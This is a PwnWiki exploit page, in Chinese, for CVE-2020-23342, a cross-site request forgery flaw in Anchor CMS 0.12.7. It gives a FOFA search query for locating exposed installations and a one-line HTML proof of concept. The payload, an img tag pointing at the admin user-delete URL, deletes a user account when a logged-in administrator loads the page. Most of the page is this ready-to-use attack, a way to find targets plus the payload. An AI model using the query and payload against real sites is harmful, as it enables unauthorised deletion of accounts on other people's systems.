CVE-2020-23342 Anchor CMS 0.12.7 跨站請求僞造漏洞

From PwnWiki

Revision as of 12:59, 23 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> "Anchor CMS" && body="themes/default/img/favicon.png" </pre> ==POC== Anchor CMS使用Get方法進行敏感操作，可以使用exploit.html進行刪除用戶...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

"Anchor CMS" && body="themes/default/img/favicon.png"

POC

Anchor CMS使用Get方法進行敏感操作，可以使用exploit.html進行刪除用戶等操作。

exploit.html

<img src="http://target/anchor/index.php/admin/users/delete/21">

當管理員點擊時刪除ID為21的用戶。

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2020-23342_Anchor_CMS_0.12.7_跨站請求僞造漏洞&oldid=3232"